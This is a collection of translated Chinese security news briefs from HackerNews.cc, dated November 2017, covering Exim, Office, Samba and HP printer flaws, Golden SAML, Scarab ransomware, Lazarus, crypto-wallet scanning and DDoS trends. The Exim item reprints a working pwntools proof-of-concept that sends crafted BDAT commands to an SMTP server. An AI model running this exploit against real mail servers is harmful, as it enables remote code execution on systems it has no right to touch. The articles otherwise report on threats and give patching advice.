Unix 邮件传输代理软件 “Exim” 存在两处关键漏洞,可执行远程代码、开展 DDoS 攻击

HackerNews.cc 11 月 27 日报道,台湾安全公司 DEVCORE 的研究人员 Meh 于近期发现互联网邮件传输代理(MTA)软件 Exim 存在一处关键漏洞(CVE-2017-16943),允许黑客向 SMTP 服务器发送 BDAT 命令,从而触发漏洞后远程执行任意代码。调查显示,有超过 40 万台服务器的分块功能已遭该漏洞影响。 Exim 是剑桥大学开发的一款基于 GPL 协议的开放源代码软件,其主要用于连接互联网 Unix 系统的消息传输代理(MTA)服务器。目前,据三月份进行的一百多万台邮件服务器的分析表明,超过 56% 的用户正在使用 Exim 软件。 调查显示,该漏洞由一台公共 bug 跟踪器检测发现并在补丁发布之前意外披露。一旦黑客恶意利用,其系统将会处于崩溃状态,因为该函数指针的 receive_getc 并未被重置。以下是该漏洞部分概念验证代码(PoC)显示: # pip install pwntools from pwn import * r = remote(‘localhost’, 25) r.recvline() r.sendline(“EHLO test”) r.recvuntil(“250 HELP”) r.sendline(“MAIL FROM:<test@localhost>”) r.recvline() r.sendline(“RCPT TO:<test@localhost>”) r.recvline() #raw_input() r.sendline(‘a’*0x1100+’\x7f’) #raw_input() r.recvuntil(‘command’) r.sendline(‘BDAT 1’) r.sendline(‘:BDAT \x7f’) s = ‘a’*6 + p64(0xdeadbeef)*(0x1e00/8) r.send(s+ ‘:\r\n’) r.recvuntil(‘command’) #raw_input() r.send(‘\n’) r.interactive() exit() 虽然跟踪器会警示 Exim 软件存在漏洞,但根据用户习惯来看告警通知极有可能被忽略。不过,现开发人员已采取安全措施防止此类事件恶意发展,并提醒运行 Exim 4.88 或更高版本的用户将其主要配置参数 chunking_advertise_hosts 设置为空值,从而禁用 ESMTP 扩展、使 BDAT 无法使用,以便关闭易受攻击程序。 另外,研究人员发现的另一个漏洞(CVE-2017-16944)能够允许黑客利用 BDAT 命令与恶意函数远程开展拒绝服务(DoS)攻击。该漏洞影响了 Exim 4.88 和 4.89 中的 SMTP 后台进程。对此,研究人员建议系统管理人员尽快更新至 Exim 4.90 版本,以防可能的黑客恶意攻击。 消息来源:securityaffairs.co,译者:青楚 本文由 HackerNews.cc 翻译整理,封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接。

澳大利亚提出消费者新法案,意在促进银行与金融机构数据安全改革

据外媒 ZDNet 11 月 26 日报道,澳大利亚政府于近期提出一项新消费者法案,允许公民访问银行、能源、通信以及互联网等交易数据。与此同时,还将同意各企业或政府机构与第三方合作厂商共享数据,以便促进全球网络安全,保护家庭、消费者、企业和政府免遭犯罪攻击。相关人士获悉,该消费者法案一旦通过,其数据权限将由澳大利亚竞争与消费者委员会(ACCC)和澳大利亚信息专员机构(OAIC)联合监管。 知情人士透露,这一法案由澳大利亚城市与数字化转型的助理部长 Angus Taylor 提出,是新一代消费者权益法案的最大改革。随之,澳大利亚生产力委员会也针对其金融体系展开了一系列深入调查,并被提出 41 项相关建议,要求开放消费者数据实践。根据政府的说法,该项法案的提出与生产力委员会的调查结果 “大体一致”。然而,在针对众议院的经济委员会和四大银行调查时,西太平洋银行的首席执行官 Brian Hartzer 表示,他们完全支持数据共享实践,但又极其担心这两家监管机构是否能够保障公民隐私安全。另外,澳大利亚联邦银行(CBA)、澳大利亚国民银行,以及澳大利亚和新西兰银行集团也对此法案的推出具有同样的担忧。 CBA 即将离任的首席执行官 Ian Nare 先前就曾表示,在开放式的银行制度下,必须明确指出负责隐私与安全的具体指导方针。虽然 Hartzer 迫切希望银行企业能够领导国家数据开放改革,但因为缺乏隐私保障,这一法案被消费者委员会主席驳回。不过,政府将在 2017-2018 财政预算提案中宣布独立的开放银行审查制度,希望能够增加消费者和第三方合作厂商获得产品与消费者数据的期望。 澳大利亚财政部部长 Scott Morrison 于今年早些时候在悉尼举行的 2017 亚洲未来峰会上表示:“开放式银行业务将会改变澳大利亚经济的发展。我们可以做出的最大变化之一就是在未来 20 年内与这个领域最具权威的机构–生产力委员会联合提高澳大利亚公民隐私安全。此外,在能源方面,国家电力市场未来安全的独立审查也需要与其保持一致,并由澳大利亚政府理事会同意,从而提高消费者获取与分享能源数据的能力。同样,在通信方面,该项改革将帮助消费者在其市场上找到最适合他们的策划,并使其实际服务的使用与预算匹配。据悉,澳大利亚政府将于 2018 年提出新联邦立法落实这些改革。 消息来源:ZDNet,译者:青楚 本文由 HackerNews.cc 翻译整理,封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接。

黑客组织 Cobalt 正通过潜伏 17 年的 Office 漏洞针对全球金融机构展开钓鱼攻击

HackerNews.cc 11 月 26 日消息,网络安全公司 Reversing Lab 研究人员最新发现黑客组织 Cobalt 正通过微软近期披露的 Office 漏洞(CVE-2017-11882)针对全球银行等金融机构展开网络钓鱼攻击。 该漏洞由 Embedi 研究人员率先在 Microsoft Office 组件的 EQNEDT32.EXE 模块(负责文件插入与公式编辑)中发现,是一处内存损害问题,允许攻击者利用当前登录的用户身份执行任意代码。该漏洞影响了过去 17 年来发布的所有 Microsoft Office 版本,其中包括新版 Microsoft Office 365。此外,它还可能触发所有版本的 Windows 操作系统。值得庆幸的是,CVE-2017-11882 的补丁已在本月例行安全更新中发布。 研究显示,黑客组织 Cobalt 主要在通过垃圾邮件肆意分发 RTF 恶意文档时感染目标用户系统。这一感染流程分为多个阶段: ○ 首先,用户打开 RTF 文档后系统将会自动利用 MS 方程触发 CVE-2017-11882 漏洞; ○ 随后,黑客将通过调用 Mshta.exe 文件获取并执行恶意脚本代码; ○ 最终,该脚本在运行时将会嵌入本地 playload,从而根据设备体系结构(32 位或 64 位)下载 DLL 恶意文件,以便感染目标系统。 需要留意的是,这并非 Cobalt 第一次利用微软漏洞展开攻击。知情人士透露,该黑客组织此前就曾利用微软 RCE 漏洞( CVE-2017-8759 )针对欧洲、美洲、俄罗斯等银行 ATM 设备以及金融机构开展攻击活动。虽然该漏洞目前已被修复,但并不能完全避免漏洞攻击的风险,因此研究人员提醒各企业管理人员在更新系统的同时,禁用 Eqnedt 模块是最保险的方法。 更多内容: ○  微软 Office 漏洞(CVE-2017-11882)概念验证(PoC):https://github.com/embedi/CVE-2017-11882 ○  微软 Office 漏洞(CVE-2017-11882)补丁地址:https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882 ○  为保护系统,管理员应该需要应用最新补丁包括: KB2553204,KB3162047,KB4011276 和 KB4011262。 消息来源:securityaffairs.co,译者:青楚 本文由 HackerNews.cc 翻译整理,封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接。

新型攻击技术 Golden SAML 可伪造企业身份验证窃取云应用资源

HackerNews.cc 11 月 25 日消息,网络安全公司 CyberArk Labs 研究人员于近期设计了一种新型入侵攻击技术 Golden SAML,允许黑客创建虚假的企业信息后伪造身份验证,从而窃取云应用资源。目前,CyberArk 已推出一款新黑客工具 shimit,可以实现 Golden SAML 攻击技术。 SAML (Security Assertion Markup Language)协议是用户与服务供应商交换身份验证和授权数据的开放标准,而黑客可以通过 Golden SAML 攻击技术伪造 “身份验证对象”,并使用 SAML 2.0 协议作为 SSO 机制的所有服务验证,从而获取用户最高特权。此外,在 Golden SAML 攻击中,黑客还可访问所有支持 SAML 认证的应用程序(如 Azure、AWS、vSphere等)并拥有其任一特权。 研究显示,由于 SAML 协议中的每条声明都是通过存储在用户环境中的特定 RSA 密钥进行信任与签名。因此,为了进行该攻击活动,其黑客需要使用一私有密钥,并与 Active Directory 联合身份验证账户、令牌签名私钥、IdP 公共证书、IdP 名称、所扮演的角色名称、域/用户名,以及 AWS 中的角色会话名称与亚马逊帐户 ID 等共同操作才可完成攻击活动。(其中红色标记部分为必备字段) 研究人员表示,这些攻击的先决条件极其重要,因为此技术不易在真正的攻击场景中使用。另外,如果想要减轻 Golden SAML 攻击也并不容易,因为它既不依赖 SAML 2.0 漏洞,也未通过 AWS / ADFS 漏洞进行,事实上,攻击者主要通过获取域管理员访问权限实施此类活动。此外,一旦该攻击技术被恶意使用,其系统将很难检测出来。 然而,值得注意的是,研究人员特意令 Golden SAML 的命名与此前一种臭名昭着的攻击技术 “Golden Ticket” 类似,其原因是他们想通过前者设计验证后者的危害程度,所以这两种技术具有极其相似的攻击性质。据悉,后者在 Kerberos 环境中可持久性获得任一类型访问权限并还可通过操纵 Windows Server Kerberos 身份验证框架,完全控制目标 IT 基础设施。   消息来源:securityaffairs.co,译者:青楚 本文由 HackerNews.cc 翻译整理,封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接。

网络犯罪分子正通过互联网扫描窃取用户在线暴露的虚拟钱包

HackerNews.cc 11 月 24 日消息,网络安全专家 Didier Stevens 于近期(比特币价格从 7,000 美元升至 8000 美元时)在其蜜罐中发现黑客正进行一项扫描活动,旨在检测在线暴露的比特币钱包后不断提出访问请求,从而试图获取钱包加密货币。这种情况极其罕见,其首次发生于 2013 年比特币价格第一次升涨时期。 黑客们除了比特币外也会将其他加密货币作为探索目标,比如以太坊(Ethereum)。研究人员 Dimitrios Slamaris 就于近期发现黑客在本地公开的 Ethereum 节点向目标 JSON-RPC 接口发出调用请求,命令系统将用户资金转移至攻击者钱包。随后,网络安全中心 Johannes Ullrich 发现两个 IP 地址通过上述请求扫描用户加密钱包: 216[.]158[.]238[.]186 – Interserver Inc .(新泽西托管公司) 46[.]166[.]148[.]120 – NFOrce Entertainment BV(Durch托管公司) 目前,如果您正在使用/运行 Ethereum 节点,那么请确保该节点未被监听查询,因为此类操作都是非常简单的 HTTP 请求,它们不受同源策略的保护,很容易被黑客利用 Javascript 窃取信息。研究人员提醒用户/管理员尽快在其服务器上禁用 JSON-RPC 接口的入站查询或代理请求,以便系统只筛选已批准的客户设备。 相关阅读: ○ 安全专家发布的互联网当前泛滥的以太坊 JSON-RPC 扫描问题 消息来源:securityaffairs.co ,译者:青楚 本文由 HackerNews.cc 翻译整理,封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接。

新勒索软件 Scarab 变种已通过僵尸网络 Necurs 感染全球数百万用户设备

据外媒 11 月 25 日报道,网络安全公司 F- Secure 和 Forcepoint 研究人员于本周五发现新勒索软件 Scarab 变种正通过僵尸网络 Necurs 向数百万用户发起大规模垃圾邮件活动。目前,黑客仅在短短几个小时内就已发出 1250 万封垃圾邮件。 僵尸网络 Necurs 是全球垃圾邮件最大的 “发送者” 之一,其每月可感染逾 600 万受害主机,并诱导用户打开附件后在线下载恶意软件。此外,Necurs 在过去数月内推动了多款恶意软件的传播,其中包括 Locky、JAFF、GlobeImposter、Dridex 和 Trickbot。 知情人士透露,勒索软件 Scarab 于今年 6 月由安全专家 Michael Gillespie 率先发现,其代码主要根据勒索软件的开源验证编写而成。调查显示,黑客在此次攻击活动中主要通过租用的僵尸网络将附带 Scarab 的电子邮件伪装成以 Lexmark 、HP 、Canon 、Epson 为主题的扫描档案发送至目标邮箱,并在用户打开后感染受害系统。随后,研究人员发现该电子邮件附带的 7 份 Zip 文件包含一个 Visual Basic 脚本,可充当 dropper 木马感染目标设备。此外,他们还通过 ID-Ransomware 服务针对受害系统进行了一系列检测并清楚的看出 Scarab 每日感染数量。 近期,研究人员发现黑客所使用的变体还可以利用 “[suupport@protonmail.com]. scarab” 扩展加密目标用户原始文件名后删除文件,从而使其无法自行恢复。如果用户想要还原文件,则需通过邮件恶意软件或 BitMessage 联系 Scarab 幕后黑手支付赎金。 消息来源:securityaffairs.co,译者:青楚 本文由 HackerNews.cc 翻译整理,封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接。

Red Hat 等主要的 Linux 发行版厂商修复两处 Samba 漏洞

据外媒 11 月 23 日报道,网络安全公司的研究人员于今年 9 月发现 Samba SMB1 协议存在一处 UAF 漏洞(CVE-2017-14746),允许黑客通过 SMB1 请求重新分配堆指针后不仅可以控制堆上的信息,还可通过漏洞攻击 SMB 服务器,受影响范围包括 Samba 4.0.0 以前所有版本。 Red Hat、Ubuntu、Debian 等主要的 Linux 发行版厂商近期推出了 4.7.3、4.6.11 和 4.5.15 版本的修复补丁。另外,研究人员还提供了一个解决方案,建议用户可以通过设置参数禁止访问 SMB1 服务器: ○ server min protocol = SMB2 ○ to the [global] section of your smb.conf and restart smbd. 但是,需要注意的是这可能会影响之前的用户无法连接到服务器。 对于 Samba 还存在的另一漏洞(CVE-2017-15275),目前官方也已经释出修复补丁,曾允许攻击者通过精心构造的恶意请求发送至受影响版本( 3.6.0 以后的所有版本)的服务器,从而获取系统内存中未被清除的哈希密码或其他敏感数据。 这一漏洞导致受害系统的服务器在分配堆内存时可能会在未清除下将其先前所包含的敏感数据返回至客户端,从而使攻击者获取重要信息后通过其他方法破坏系统服务器。 HackerNews.cc 在此强烈建议使用 Samba 的用户/企业及时修复补丁或更新系统至最新版本。 更多内容: 4.7.3、4.6.11 和 4.5.15 版本补丁地址:http://www.samba.org/samba/security/ 一些已不被支持的旧版本补丁地址:https://www.samba.org/samba/patches/ 消息来源:securityaffairs.co ,译者:青楚 本文由 HackerNews.cc 翻译整理,封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接。

朝鲜 APT 组织 Lazarus 或利用安卓恶意软件针对韩国三星用户展开新一轮网络攻击

据外媒 11 月 22 日报道,网络安全公司 McAfee 与 Palo Alto Networks 研究人员近期发现朝鲜 APT 组织 Lazarus 似乎开始利用一款 Android 恶意软件针对韩国三星用户展开新一轮网络攻击。 Lazarus(音译 “ 拉撒路 ”)堪称全球金融机构首要威胁。该组织自 2009 年以来一直处于活跃状态,据推测早在 2007 年就已涉足摧毁数据及破坏系统的网络间谍活动。调查显示,黑客组织 Lazarus 与 2014 年索尼影业遭黑客攻击事件及 2016 年孟加拉国银行数据泄露事件有关。 调查显示,该恶意软件主要附着在一款用于阅读韩文圣经的合法 APK 中并由开发人员 GODpeople 在 Google Play 发布。截至目前,该应用已被下载 1300 多次。McAfee 经分析表示,其恶意软件主要为可执行与可链接格式(ELF)文件提供一个后门,允许攻击者完全控制受害设备。另外,该后门程序所使用的命令与控制(C&C)服务器列表与黑客组织 Lazarus 此前使用的 IP 地址有关。   Palo Alto Networks 安全专家指出,此次活动似乎主要针对韩国三星用户展开攻击,并与此前 Lazarus 开展的 “ Operation Blockbuster” 活动存有潜在联系,例如:所使用的 Payload、恶意软件代码,以及托管的合法 APK 都极其相似等。随后,Unit 42 安全专家对上传到 VirusTotal 的 PE 文件分析后发现,这一文件被用于从 HTTP 服务器传送  ELF ARM 和 APK 文件,从而感染更多设备后允许攻击者展开大规模攻击活动。 目前,Palo Alto Networks 由证据表示,该恶意软件代码与 Lazarus 对 SWIFT 银行系统和 Operation Blockbuster 攻击活动所使用的有效负载具有重叠部分,因此这似乎意味着该组织持续使用同一系列的黑客工具展开攻击活动。对此,他们推测 Lazarus 似乎正忙于全球业务的扩张发展。 更多阅读: 来自 McAfee 的分析报告 <Lazarus Cybercrime Group Moves to Mobile Platform> 消息来源:securityaffairs.co ,译者:青楚 本文由 HackerNews.cc 翻译整理,封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接。

惠普两款企业打印机存在一处高危远程代码执行漏洞

HackerNews.cc 11 月 22 日报道,网络安全公司 FoxGlove 研究人员近期在惠普部分企业的打印机中发现一处高危漏洞,允许黑客入侵目标系统后远程执行恶意代码。 知情人士透露,惠普在设计安全打印系统方面投入了大量精力,其公司早于 2015 年就已推出企业级 LaserJet 打印机,并在后续不同时间内陆续推出多项安全性能改进。据悉,这家科技巨头曾声称提供了“全球最安全的打印服务”,而且还发布了一项调查报告,指出其他供应厂商的打印设备极易遭受黑客攻击并会对企业造成重大损失。 研究人员表示,他们主要使用了一款由德国鲁尔大学安全专家开发的黑客工具 PRET(PRinter Exploitation Toolkit)通过 HP PageWide Enterprise 586dn 和 HP LaserJet Enterprise M553n 两款多功能打印机的操作系统与设备固件进行了一项逆向渗透测试。据称,这款黑客工具曾用于检测戴尔、兄弟、Konica、三星、HP、OKI 和 Lexmark 等 20 余款打印设备是否存在安全漏洞。 PRET 工具的神奇之处在于查找路径漏洞时不仅可以规避安全检测、访问任何打印内容(包括受 PIN 码保护的内容),还可用于发现操控打印内容的安全漏洞后将其设备恢复出厂设置。 研究团队在分析了固件更新与 HP 软件解决方案后发现可以利用 OXP 平台和 SDK 来扩展打印设备功能。不过,该解决方案和固件更新必须经过数字签名的单个 .BDL 文件提供。此外,由于签名验证需要安全检测,因此 FoxGlove 研究人员未能成功将恶意固件上传至目标设备。但是,他们设计了其他攻击媒介用于破解签名验证并设法上传恶意 DLL 文件后执行任意代码。 目前,惠普已收到 FoxGlove 研究人员在测试期间所使用的工具源代码以及漏洞概念验证(PoC)报告,并表示将于本周发布安全更新,修复漏洞补丁。 消息来源:securityaffairs.co ,译者:青楚 本文由 HackerNews.cc 翻译整理,封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接。

2017 上半年 DDoS 攻击数量倍增,罪魁祸首竟然是它?

网络安全公司 Corero 于近期发布一份报告,宣称 2017 上半年的 DDoS 攻击数量增加一倍,起因竟是各企业及用户所使用的不安全物联网(IoT)设备。据称,只要用户设备在线联网,其拒绝服务(DDoS)攻击就将存在。倘若企业依赖互联网销售产品或协作,那么 DDoS 攻击不仅仅是一个麻烦,更将影响企业后续发展。 在过去数年内,DDoS 攻击的数量在 “猫捉老鼠” 的演变过程中呈缓慢趋势增长,即犯罪分子一旦加强攻击,其网络供应商就会进行弹性防御。然而,此类攻击一般都来自被感染的计算机和服务器组成的僵尸网络。不过,由于在僵尸网络中获取和维护这些系统的成本相对较高,因此在攻击发展的速度方面存在经济限制。 但是,僵尸网络 Mirai 的开发人员就很 “聪明”, 并未针对安全团队或安全设施开展攻击,而是把重点瞄准数百万家用物联网设备,例如利用网络摄像头与互联网路由器构建僵尸网络开展 DDoS 攻击。由于 Mirai 无需任何安全措施检测,因此它能在肆意感染的同时发起比以往更大的攻击活动。 根据 Arbor Networks 2016 年年底的报告显示,物联网设备已然成为 DDoS 攻击来源。到目前为止,这些大规模的攻击还未利用反射/放大技术展开。相关数据显示,DDoS 攻击的数量在 2015 年显著上升,其攻击的平均规模和时间也在不断增加。由卡巴斯基 2016 年第四季度 DDoS 情报报告得知,DDoS 攻击持续时间最长为 292 小时(或 12.2 天),明显长于上一季度( 184 小时或 7.7 天),创下 2016 年的纪录。 研究人员表示,目标企业现平均每天遭受 8 次 DDoS 攻击,均由不安全物联网设备和 DDoS 出租服务导致。虽然大规模的 DDoS 攻击正得到媒体关注,但这只是攻击的一小部分。然而,最令人感兴趣的是,2017 年第二季度发生的第五次 DDoS 攻击使用了多种媒介进行,旨在规避安全软件检测。目前,只需要每小时 20 美元,任何黑客都可采用僵尸网络针对目标企业发动攻击。此外,网络犯罪分子已经将 DDoS 攻击作为一项有利可图的开发项目,这就意味着拒绝服务攻击的活动仍将继续。 关联阅读: ○ 卡巴斯基实验室 《黑色星期五威胁报告》(英文) ○ 卡巴斯基实验室《2017 年第三季度的 DDoS 攻击报告》(英文) ○ 卡巴斯基实验室《2018 年威胁预测》(英文)   消息来源:securityaffairs.co ,译者:青楚 本文由 HackerNews.cc 翻译整理,封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接。